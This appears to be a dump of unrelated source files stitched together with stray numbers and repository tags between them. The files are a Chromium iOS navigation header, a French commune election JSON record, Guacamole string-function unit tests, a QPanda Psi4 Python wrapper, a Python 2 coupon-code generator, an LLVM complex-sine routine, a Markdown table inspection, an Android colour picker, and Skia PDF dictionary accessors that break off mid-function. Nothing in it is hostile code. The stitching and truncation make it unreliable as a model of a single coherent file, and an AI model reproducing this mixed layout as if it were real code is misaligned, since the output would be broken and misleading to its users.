// Copyright 2018 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef IOS_CHROME_BROWSER_WEB_WEB_NAVIGATION_UTIL_H_ #define IOS_CHROME_BROWSER_WEB_WEB_NAVIGATION_UTIL_H_ #include "components/search_engines/template_url.h" #import "ios/web/public/navigation/navigation_manager.h" #include "ui/base/page_transition_types.h" namespace web { class WebState; } class GURL; namespace web_navigation_util { // Creates a WebLoadParams object for loading |url| with |transition_type|. If // |post_data| is nonnull, the data and content-type of the post data will be // added to the return value as well. web::NavigationManager::WebLoadParams CreateWebLoadParams( const GURL& url, ui::PageTransition transition_type, TemplateURLRef::PostContent* post_data); // Navigates to the previous item on the navigation stack for |web_state|. // |web_state| can't be null. This method is for user initiated navigations as // it logs "Back" user action. void GoBack(web::WebState* web_state); // Navigates to the next item on the navigation stack for |web_state|. // |web_state| can't be null. This method is for user initiated navigations as // it logs "Forward" user action. void GoForward(web::WebState* web_state); } // namespace web_navigation_util #endif // IOS_CHROME_BROWSER_WEB_WEB_NAVIGATION_UTIL_H_
478
348
{"nom":"Auterrive","dpt":"Pyrénées-Atlantiques","inscrits":104,"abs":23,"votants":81,"blancs":5,"nuls":1,"exp":75,"res":[{"panneau":"1","voix":53},{"panneau":"2","voix":22}]}
74
1,450
<reponame>dev-ddoe/guacamole-server /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ #include <CUnit/CUnit.h> #include <guacamole/string.h> #include <stdlib.h> #include <string.h> /** * Verify guac_strlcat() behavior when the string fits the buffer without * truncation. The return value of each call should be the length of the * resulting string. Each resulting string should contain the full result of * the concatenation, including null terminator. */ void test_string__strlcat() { char buffer[1024]; memset(buffer, 0xFF, sizeof(buffer)); strcpy(buffer, "Apache "); CU_ASSERT_EQUAL(guac_strlcat(buffer, "Guacamole", sizeof(buffer)), 16); CU_ASSERT_STRING_EQUAL(buffer, "Apache Guacamole"); CU_ASSERT_EQUAL(buffer[17], '\xFF'); memset(buffer, 0xFF, sizeof(buffer)); strcpy(buffer, ""); CU_ASSERT_EQUAL(guac_strlcat(buffer, "This is a test", sizeof(buffer)), 14); CU_ASSERT_STRING_EQUAL(buffer, "This is a test"); CU_ASSERT_EQUAL(buffer[15], '\xFF'); memset(buffer, 0xFF, sizeof(buffer)); strcpy(buffer, "AB"); CU_ASSERT_EQUAL(guac_strlcat(buffer, "X", sizeof(buffer)), 3); CU_ASSERT_STRING_EQUAL(buffer, "ABX"); CU_ASSERT_EQUAL(buffer[4], '\xFF'); memset(buffer, 0xFF, sizeof(buffer)); strcpy(buffer, "X"); CU_ASSERT_EQUAL(guac_strlcat(buffer, "", sizeof(buffer)), 1); CU_ASSERT_STRING_EQUAL(buffer, "X"); CU_ASSERT_EQUAL(buffer[2], '\xFF'); memset(buffer, 0xFF, sizeof(buffer)); strcpy(buffer, ""); CU_ASSERT_EQUAL(guac_strlcat(buffer, "", sizeof(buffer)), 0); CU_ASSERT_STRING_EQUAL(buffer, ""); CU_ASSERT_EQUAL(buffer[1], '\xFF'); } /** * Verify guac_strlcat() behavior when the string must be truncated to fit the * buffer. The return value of each call should be the length that would result * from concatenating the strings given an infinite buffer, however only as * many characters as can fit should be appended to the string within the * buffer, and the buffer should be null-terminated. */ void test_string__strlcat_truncate() { char buffer[1024]; memset(buffer, 0xFF, sizeof(buffer)); strcpy(buffer, "Apache "); CU_ASSERT_EQUAL(guac_strlcat(buffer, "Guacamole", 9), 16); CU_ASSERT_STRING_EQUAL(buffer, "Apache G"); CU_ASSERT_EQUAL(buffer[9], '\xFF'); memset(buffer, 0xFF, sizeof(buffer)); strcpy(buffer, ""); CU_ASSERT_EQUAL(guac_strlcat(buffer, "This is a test", 10), 14); CU_ASSERT_STRING_EQUAL(buffer, "This is a"); CU_ASSERT_EQUAL(buffer[10], '\xFF'); memset(buffer, 0xFF, sizeof(buffer)); strcpy(buffer, "This "); CU_ASSERT_EQUAL(guac_strlcat(buffer, "is ANOTHER test", 6), 20); CU_ASSERT_STRING_EQUAL(buffer, "This "); CU_ASSERT_EQUAL(buffer[6], '\xFF'); } /** * Verify guac_strlcat() behavior with zero buffer sizes. The return value of * each call should be the size of the input string, while the buffer remains * untouched. */ void test_string__strlcat_nospace() { /* 0-byte buffer plus 1 guard byte (to test overrun) */ char buffer[1] = { '\xFF' }; CU_ASSERT_EQUAL(guac_strlcat(buffer, "Guacamole", 0), 9); CU_ASSERT_EQUAL(buffer[0], '\xFF'); CU_ASSERT_EQUAL(guac_strlcat(buffer, "This is a test", 0), 14); CU_ASSERT_EQUAL(buffer[0], '\xFF'); CU_ASSERT_EQUAL(guac_strlcat(buffer, "X", 0), 1); CU_ASSERT_EQUAL(buffer[0], '\xFF'); CU_ASSERT_EQUAL(guac_strlcat(buffer, "", 0), 0); CU_ASSERT_EQUAL(buffer[0], '\xFF'); } /** * Verify guac_strlcat() behavior with unterminated buffers. With respect to * the return value, the length of the string in the buffer should be * considered equal to the size of the buffer, however the resulting buffer * should not be null-terminated. */ void test_string__strlcat_nonull() { char expected[1024]; memset(expected, 0xFF, sizeof(expected)); char buffer[1024]; memset(buffer, 0xFF, sizeof(buffer)); CU_ASSERT_EQUAL(guac_strlcat(buffer, "Guacamole", 256), 265); CU_ASSERT_NSTRING_EQUAL(buffer, expected, sizeof(expected)); memset(buffer, 0xFF, sizeof(buffer)); CU_ASSERT_EQUAL(guac_strlcat(buffer, "This is a test", 37), 51); CU_ASSERT_NSTRING_EQUAL(buffer, expected, sizeof(expected)); memset(buffer, 0xFF, sizeof(buffer)); CU_ASSERT_EQUAL(guac_strlcat(buffer, "X", 12), 13); CU_ASSERT_NSTRING_EQUAL(buffer, expected, sizeof(expected)); memset(buffer, 0xFF, sizeof(buffer)); CU_ASSERT_EQUAL(guac_strlcat(buffer, "", 100), 100); CU_ASSERT_NSTRING_EQUAL(buffer, expected, sizeof(expected)); }
2,031
631
<gh_stars>100-1000 #include "Components/ChemiQ/Psi4Wrapper.h" #include "Core/Utilities/Tools/QString.h" #include <math.h> #if defined(_DEBUG) #undef _DEBUG #include <Python.h> #define _DEBUG #else #include <Python.h> #endif #include <codecvt> namespace QPanda { Psi4Wrapper::Psi4Wrapper() { } void Psi4Wrapper::initialize(const std::string &chemiq_dir) { #ifdef _MSC_VER if (!chemiq_dir.empty()) { using convert_typeX = std::codecvt_utf8<wchar_t>; std::wstring_convert<convert_typeX, wchar_t> converterX; auto w_chemiq_dir = converterX.from_bytes(chemiq_dir); Py_SetPath(w_chemiq_dir.c_str()); } #endif Py_Initialize(); /* Alter sys path eventment */ std::string chdir_cmd = std::string("sys.path.append(\"") + chemiq_dir + "\")"; PyRun_SimpleString("import sys"); PyRun_SimpleString(chdir_cmd.c_str()); //PyRun_SimpleString("print(sys.path)"); } bool Psi4Wrapper::run() { auto u_name = PyUnicode_FromString("psi4_wrapper"); auto module = PyImport_Import(u_name); if (module == NULL) { PyErr_Print(); m_last_error = "PyImport_Import() return NULL!"; return false; } Py_DECREF(u_name); auto call_func = PyObject_GetAttrString(module, "run_psi4"); Py_DECREF(module); if (call_func == NULL) { PyErr_Print(); m_last_error = "PyObject_GetAttrString() return NULL!"; return false; } auto args = Py_BuildValue( "({s:s,s:i,s:i,s:s,s:d})", "mol",m_molecule.c_str(), "multiplicity", m_multiplicity, "charge", m_charge, "basis", m_basis.c_str(), "EQ_TOLERANCE", m_eq_tolerance); auto result = PyObject_Call(call_func, args, NULL); if (result == NULL) { PyErr_Print(); m_last_error = "PyObject_Call() return NULL!"; return false; } int success = 1; char *value; PyArg_ParseTuple(result, "is", &success, &value); if (success == 0) { m_data = std::string(value); } else { m_last_error = std::string(value); } Py_DECREF(args); Py_DECREF(call_func); Py_DECREF(result); return success == 0; } void Psi4Wrapper::finalize() { Py_Finalize(); } }
1,084
3,976
#!/usr/local/bin/python #coding=utf-8 #第 0001 题:做为 Apple Store App 独立开发者,你要搞限时促销,为你的应用生成激活码(或者优惠券), #使用 Python 如何生成 200 个激活码(或者优惠券)? import uuid def create_code(num, length): #生成”num“个激活码,每个激活码含有”length“位 result = [] while True: uuid_id = uuid.uuid1() temp = str(uuid_id).replace('-', '')[:length] if not temp in result: result.append(temp) if len(result) == num: break return result print create_code(200, 20)
360
716
/* * Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. * See https://llvm.org/LICENSE.txt for license information. * SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception * */ #include "mthdecls.h" CMPLXFUNC_C(__mth_i_csin) { CMPLXARGS_C; float x, y; /* x = SINF(real) * COSHF(imag); y = COSF(real) * SINHF(imag); */ x = sinf(real); y = cosf(real); x = x * coshf(imag); y = y * sinhf(imag); CRETURN_F_F(x, y); }
217
921
<gh_stars>100-1000 // Copyright (c) 2015-2020 <NAME> <<EMAIL>> Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file. package com.vladsch.md.nav.inspections.table; import com.intellij.codeInspection.InspectionManager; import com.intellij.codeInspection.ProblemDescriptor; import com.intellij.codeInspection.ProblemHighlightType; import com.intellij.openapi.project.Project; import com.intellij.psi.PsiElement; import com.intellij.psi.PsiFile; import com.vladsch.flexmark.ext.tables.TableExtractingVisitor; import com.vladsch.flexmark.ext.tables.TablesExtension; import com.vladsch.flexmark.util.ast.Document; import com.vladsch.flexmark.util.data.MutableDataHolder; import com.vladsch.flexmark.util.format.MarkdownTable; import com.vladsch.flexmark.util.misc.Utils; import com.vladsch.flexmark.util.sequence.BasedSequence; import com.vladsch.flexmark.util.sequence.LineAppendable; import com.vladsch.md.nav.MdBundle; import com.vladsch.md.nav.MdFileType; import com.vladsch.md.nav.actions.handlers.util.PsiEditAdjustment; import com.vladsch.md.nav.annotator.ReplaceTextChangeQuickFix; import com.vladsch.md.nav.inspections.LocalInspectionToolBase; import com.vladsch.md.nav.inspections.ProblemDescriptors; import com.vladsch.md.nav.parser.MdLexParserManager; import com.vladsch.md.nav.psi.element.MdComposite; import com.vladsch.md.nav.psi.element.MdFile; import com.vladsch.md.nav.psi.element.MdTable; import com.vladsch.md.nav.psi.util.BlockPrefixes; import com.vladsch.md.nav.psi.util.MdPsiImplUtil; import com.vladsch.md.nav.psi.util.MdTypes; import com.vladsch.md.nav.settings.MdRenderingProfile; import com.vladsch.md.nav.settings.MdRenderingProfileManager; import com.vladsch.md.nav.settings.ParserOptions; import com.vladsch.md.nav.util.format.FlexmarkFormatOptionsAdapter; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; public class GitHubTableInspection extends LocalInspectionToolBase { @Nullable @Override public ProblemDescriptor[] checkFile(@NotNull PsiFile file, @NotNull InspectionManager manager, boolean isOnTheFly) { if (file.getFileType() != MdFileType.INSTANCE || !file.isValid() || isIgnoreFencedCodeContent(file)) { return null; } final Project project = file.getProject(); final MdRenderingProfile renderingProfile = MdRenderingProfileManager.getInstance(project).getRenderingProfile(file); if (!renderingProfile.getParserSettings().anyOptions(ParserOptions.GFM_TABLE_RENDERING)) { return null; } final ProblemDescriptors problems = new ProblemDescriptors(); final PsiEditAdjustment editContext = new PsiEditAdjustment(file); MdPsiImplUtil.findChildrenOfAnyType((MdFile) file, false, false, false, element -> { LineAppendable tableChars = editContext.getLineAppendable(); tableChars.append(editContext.elementText(element)).line(); MdPsiImplUtil.adjustLinePrefix(element, tableChars, editContext); Document root = MdLexParserManager.parseFlexmarkDocument(renderingProfile, tableChars.toString(false), true); if (root != null) { BlockPrefixes prefixes = MdPsiImplUtil.getBlockPrefixes(element, null, editContext).finalizePrefixes(editContext); BasedSequence childContPrefix = prefixes.getChildContPrefix(); FlexmarkFormatOptionsAdapter flexmarkFormatOptionsAdapter = new FlexmarkFormatOptionsAdapter(editContext, element.getTextOffset(), element.getTextOffset() + element.getTextLength()); MutableDataHolder formatOptions = flexmarkFormatOptionsAdapter.getTableFormatOptions(""); formatOptions.set(TablesExtension.APPEND_MISSING_COLUMNS, true); TableExtractingVisitor tableVisitor = new TableExtractingVisitor(formatOptions); MarkdownTable[] tables = tableVisitor.getTables(root); if (tables.length > 0) { MarkdownTable table = tables[0]; table.normalize(); if (table.header.rows.size() != 1) { PsiElement tableHeader = MdPsiImplUtil.findNestedChildByType(element, MdTypes.TABLE_HEADER); if (tableHeader != null) { problems.add(manager.createProblemDescriptor(element, MdBundle.message("annotation.table.header-rows"), true, ProblemHighlightType.GENERIC_ERROR_OR_WARNING, isOnTheFly, problems.fixes())); } } int minColumns = Integer.MAX_VALUE; int maxColumns = 0; boolean hadColumnSpans = false; StringBuilder tableText = new StringBuilder(); CharSequence sep = ""; for (PsiElement section : element.getChildren()) { for (PsiElement row : section.getNode().getElementType() == MdTypes.TABLE_SEPARATOR ? new PsiElement[] { section } : section.getChildren()) { int columns = 0; tableText.append(sep); sep = "\n" + childContPrefix.toString(); for (PsiElement part : row.getChildren()) { if (part instanceof MdComposite && part.getNode().getElementType() == MdTypes.TABLE_CELL) { PsiElement leadSeparators = part.getPrevSibling(); if (columns == 0 && leadSeparators != null) { tableText.append(leadSeparators.getText()); } tableText.append(part.getText()); PsiElement separators = part.getNextSibling(); int colSpan = Utils.minLimit(1, separators == null ? 1 : separators.getTextLength()); if (separators != null && colSpan > 1) { hadColumnSpans = true; final StringBuilder sb = new StringBuilder(); String sepCell = ""; for (int i = 0; i < colSpan; i++) { sb.append(sepCell); sepCell = " "; sb.append('|'); } tableText.append(sb); } else if (separators != null) { tableText.append(separators.getText().trim()); } columns += colSpan; } } if (minColumns > columns) minColumns = columns; if (maxColumns < columns) maxColumns = columns; } } int startOffset = element.getTextOffset(); int endOffset = startOffset + element.getTextLength(); if (minColumns != maxColumns) { LineAppendable formattedTable = editContext.getLineAppendable(); table.appendTable(formattedTable); MdPsiImplUtil.addLinePrefix(formattedTable, "", childContPrefix); problems.add(new ReplaceTextChangeQuickFix(MdBundle.message("quickfix.reformat-table"), startOffset, endOffset, formattedTable.toString())); problems.add(manager.createProblemDescriptor(element, MdBundle.message("annotation.table.inconsistent-columns"), true, ProblemHighlightType.GENERIC_ERROR_OR_WARNING, isOnTheFly, problems.fixes())); } PsiElement caption = MdPsiImplUtil.findNestedChildByType(element, MdTypes.TABLE_CAPTION); if (caption != null) { BasedSequence charSequence = editContext.getCharSequence(); int capStartOffset = charSequence.startOfLine(caption.getTextOffset()); int capEndOffset = charSequence.endOfLineAnyEOL(capStartOffset); capEndOffset += charSequence.eolStartLength(capEndOffset); problems.add(new ReplaceTextChangeQuickFix(MdBundle.message("annotation.table.caption-support.delete-caption"), capStartOffset, capEndOffset, "")); problems.add(manager.createProblemDescriptor(caption, MdBundle.message("annotation.table.caption-support"), true, ProblemHighlightType.GENERIC_ERROR_OR_WARNING, isOnTheFly, problems.fixes())); // make end offset for table the previous end of line endOffset = Math.max(0, capStartOffset - charSequence.eolEndLength(capStartOffset)); } if (hadColumnSpans) { // need to add spaces between | problems.add(new ReplaceTextChangeQuickFix(MdBundle.message("annotation.table.column-span.insert-space"), startOffset, endOffset, tableText.toString())); problems.add(manager.createProblemDescriptor(element, MdBundle.message("annotation.table.column-span"), true, ProblemHighlightType.GENERIC_ERROR_OR_WARNING, isOnTheFly, problems.fixes())); } } } }, MdTable.class); return problems.done(); } }
4,635
2,092
<reponame>GAndroidProject/MeiWidgetView<filename>widget/src/main/java/com/meis/widget/ColorPickerView.java package com.meis.widget; import android.content.Context; import android.graphics.Canvas; import android.graphics.Color; import android.graphics.ComposeShader; import android.graphics.Paint; import android.graphics.PorterDuff; import android.graphics.RadialGradient; import android.graphics.Shader; import android.graphics.SweepGradient; import android.support.annotation.Nullable; import android.util.AttributeSet; import android.view.MotionEvent; import android.view.View; import com.meis.widget.utils.DensityUtil; /** * Created by wenshi on 2018/4/27. * Description 颜色选择器 */ public class ColorPickerView extends View { //wrap_content 情况默认大小为 100dp private static int WARP_DEFAULT_SIZE = 100; private Paint mPaint; //手指的画笔 private Paint mFingerPaint; //宽高一半 的最小值 private int mPickerRadius; private int mCenterX; private int mCenterY; private int mFingerX; private int mFingerY; private int[] mGradientColors; private float[] colorHSV = new float[]{0f, 1f, 1f}; public ColorPickerView(Context context) { this(context, null); } public ColorPickerView(Context context, @Nullable AttributeSet attrs) { this(context, attrs, 0); } public ColorPickerView(Context context, @Nullable AttributeSet attrs, int defStyleAttr) { super(context, attrs, defStyleAttr); //关闭硬件加速 setLayerType(LAYER_TYPE_SOFTWARE, null); mPaint = new Paint(); mPaint.setAntiAlias(true); mFingerPaint = new Paint(); mFingerPaint.setColor(Color.WHITE); mFingerPaint.setAntiAlias(true); //获取到渐变的颜色数组 mGradientColors = getGradientColors(); } private int[] getGradientColors() { int colorCount = 12; int circleAngle = 360; int colorAngleStep = 360 / colorCount; int colors[] = new int[colorCount]; float hsv[] = new float[]{0f, 1f, 1f}; for (int i = 0; i < colors.length; i++) { hsv[0] = (i * colorAngleStep + circleAngle / 2) % circleAngle; colors[i] = Color.HSVToColor(hsv); } return colors; } private ComposeShader getPickerShader() { SweepGradient sweepGradient = new SweepGradient(mCenterX, mCenterY, mGradientColors, null); RadialGradient radialGradient = new RadialGradient(mCenterX, mCenterY, mPickerRadius, 0xFFFFFFFF, 0x00FFFFFF, Shader.TileMode.CLAMP); ComposeShader composeShader = new ComposeShader(sweepGradient, radialGradient, PorterDuff.Mode.SRC_OVER); return composeShader; } @Override protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) { super.onMeasure(widthMeasureSpec, heightMeasureSpec); int widthMode = MeasureSpec.getMode(widthMeasureSpec); int heightMode = MeasureSpec.getMode(heightMeasureSpec); int widthSize = MeasureSpec.getSize(widthMeasureSpec); int heightSize = MeasureSpec.getSize(heightMeasureSpec); int warpDefaultSize = DensityUtil.dip2px(getContext(), WARP_DEFAULT_SIZE); if (widthMode == MeasureSpec.AT_MOST && heightMode == MeasureSpec.AT_MOST) { widthSize = heightSize = warpDefaultSize; } else if (widthMode == MeasureSpec.AT_MOST) { widthSize = warpDefaultSize; } else if (heightMode == MeasureSpec.AT_MOST) { heightSize = warpDefaultSize; } setMeasuredDimension(widthSize, heightSize); } @Override protected void onSizeChanged(int w, int h, int oldw, int oldh) { super.onSizeChanged(w, h, oldw, oldh); mCenterX = w / 2; mCenterY = h / 2; mPickerRadius = Math.min(mCenterX, mCenterY); //获取选择器的渲染Shader mPaint.setShader(getPickerShader()); } @Override protected void onDraw(Canvas canvas) { super.onDraw(canvas); canvas.save(); canvas.drawCircle(mCenterX, mCenterY, mPickerRadius, mPaint); canvas.drawCircle(mFingerX, mFingerY, 10, mFingerPaint); canvas.restore(); } @Override public boolean onTouchEvent(MotionEvent event) { switch (event.getAction()) { case MotionEvent.ACTION_DOWN: case MotionEvent.ACTION_MOVE: int x = (int) event.getX(); int y = (int) event.getY(); //计算触摸点距离中心点的距离 int distance = (int) Math.sqrt((x - mCenterX) * (x - mCenterX) + (y - mCenterY) * (y - mCenterY)); if (distance <= mPickerRadius) { colorHSV[0] = (float) (Math.toDegrees(Math.atan2((y - mCenterY), (x - mCenterX))) + 180f); colorHSV[1] = Math.max(0f, Math.min(1f, (float) (distance / mPickerRadius))); mFingerY = y; mFingerX = x; postInvalidate(); } break; case MotionEvent.ACTION_UP: break; } return true; } public int getColor() { return Color.HSVToColor(colorHSV); } }
2,403
5,964
/* * Copyright 2013 Google Inc. * Use of this source code is governed by a BSD-style license that can be * found in the LICENSE file. */ #include "SkPdfGraphicsStateDictionary_autogen.h" #include "SkPdfNativeDoc.h" SkString SkPdfGraphicsStateDictionary::Type(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("Type", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2(); // TODO(edisonn): warn about missing default value for optional fields return SkString(); } bool SkPdfGraphicsStateDictionary::has_Type() const { return get("Type", "") != NULL; } double SkPdfGraphicsStateDictionary::LW(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("LW", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue(); // TODO(edisonn): warn about missing default value for optional fields return 0; } bool SkPdfGraphicsStateDictionary::has_LW() const { return get("LW", "") != NULL; } int64_t SkPdfGraphicsStateDictionary::LC(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("LC", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isInteger()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->intValue(); // TODO(edisonn): warn about missing default value for optional fields return 0; } bool SkPdfGraphicsStateDictionary::has_LC() const { return get("LC", "") != NULL; } int64_t SkPdfGraphicsStateDictionary::LJ(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("LJ", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isInteger()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->intValue(); // TODO(edisonn): warn about missing default value for optional fields return 0; } bool SkPdfGraphicsStateDictionary::has_LJ() const { return get("LJ", "") != NULL; } double SkPdfGraphicsStateDictionary::ML(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("ML", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue(); // TODO(edisonn): warn about missing default value for optional fields return 0; } bool SkPdfGraphicsStateDictionary::has_ML() const { return get("ML", "") != NULL; } SkPdfArray* SkPdfGraphicsStateDictionary::D(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("D", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isArray()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfArray*)ret; // TODO(edisonn): warn about missing default value for optional fields return NULL; } bool SkPdfGraphicsStateDictionary::has_D() const { return get("D", "") != NULL; } SkString SkPdfGraphicsStateDictionary::RI(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("RI", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2(); // TODO(edisonn): warn about missing default value for optional fields return SkString(); } bool SkPdfGraphicsStateDictionary::has_RI() const { return get("RI", "") != NULL; } bool SkPdfGraphicsStateDictionary::OP(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("OP", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isBoolean()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->boolValue(); // TODO(edisonn): warn about missing default value for optional fields return false; } bool SkPdfGraphicsStateDictionary::has_OP() const { return get("OP", "") != NULL; } bool SkPdfGraphicsStateDictionary::op(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("op", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isBoolean()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->boolValue(); // TODO(edisonn): warn about missing default value for optional fields return false; } bool SkPdfGraphicsStateDictionary::has_op() const { return get("op", "") != NULL; } int64_t SkPdfGraphicsStateDictionary::OPM(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("OPM", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isInteger()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->intValue(); // TODO(edisonn): warn about missing default value for optional fields return 0; } bool SkPdfGraphicsStateDictionary::has_OPM() const { return get("OPM", "") != NULL; } SkPdfArray* SkPdfGraphicsStateDictionary::Font(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("Font", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isArray()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfArray*)ret; // TODO(edisonn): warn about missing default value for optional fields return NULL; } bool SkPdfGraphicsStateDictionary::has_Font() const { return get("Font", "") != NULL; } SkPdfFunction SkPdfGraphicsStateDictionary::BG(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BG", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue(); // TODO(edisonn): warn about missing default value for optional fields return SkPdfFunction(); } bool SkPdfGraphicsStateDictionary::has_BG() const { return get("BG", "") != NULL; } bool SkPdfGraphicsStateDictionary::isBG2AFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BG2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isFunction(); } SkPdfFunction SkPdfGraphicsStateDictionary::getBG2AsFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BG2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue(); // TODO(edisonn): warn about missing default value for optional fields return SkPdfFunction(); } bool SkPdfGraphicsStateDictionary::isBG2AName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BG2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); } SkString SkPdfGraphicsStateDictionary::getBG2AsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BG2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2(); // TODO(edisonn): warn about missing default value for optional fields return SkString(); } bool SkPdfGraphicsStateDictionary::has_BG2() const { return get("BG2", "") != NULL; } SkPdfFunction SkPdfGraphicsStateDictionary::UCR(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("UCR", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue(); // TODO(edisonn): warn about missing default value for optional fields return SkPdfFunction(); } bool SkPdfGraphicsStateDictionary::has_UCR() const { return get("UCR", "") != NULL; } bool SkPdfGraphicsStateDictionary::isUCR2AFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("UCR2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isFunction(); } SkPdfFunction SkPdfGraphicsStateDictionary::getUCR2AsFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("UCR2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue(); // TODO(edisonn): warn about missing default value for optional fields return SkPdfFunction(); } bool SkPdfGraphicsStateDictionary::isUCR2AName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("UCR2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); } SkString SkPdfGraphicsStateDictionary::getUCR2AsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("UCR2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2(); // TODO(edisonn): warn about missing default value for optional fields return SkString(); } bool SkPdfGraphicsStateDictionary::has_UCR2() const { return get("UCR2", "") != NULL; } bool SkPdfGraphicsStateDictionary::isTRAFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isFunction(); } SkPdfFunction SkPdfGraphicsStateDictionary::getTRAsFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue(); // TODO(edisonn): warn about missing default value for optional fields return SkPdfFunction(); } bool SkPdfGraphicsStateDictionary::isTRAArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isArray(); } SkPdfArray* SkPdfGraphicsStateDictionary::getTRAsArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isArray()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfArray*)ret; // TODO(edisonn): warn about missing default value for optional fields return NULL; } bool SkPdfGraphicsStateDictionary::isTRAName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); } SkString SkPdfGraphicsStateDictionary::getTRAsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2(); // TODO(edisonn): warn about missing default value for optional fields return SkString(); } bool SkPdfGraphicsStateDictionary::has_TR() const { return get("TR", "") != NULL; } bool SkPdfGraphicsStateDictionary::isTR2AFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isFunction(); } SkPdfFunction SkPdfGraphicsStateDictionary::getTR2AsFunction(SkPdfNativeDoc* doc) { 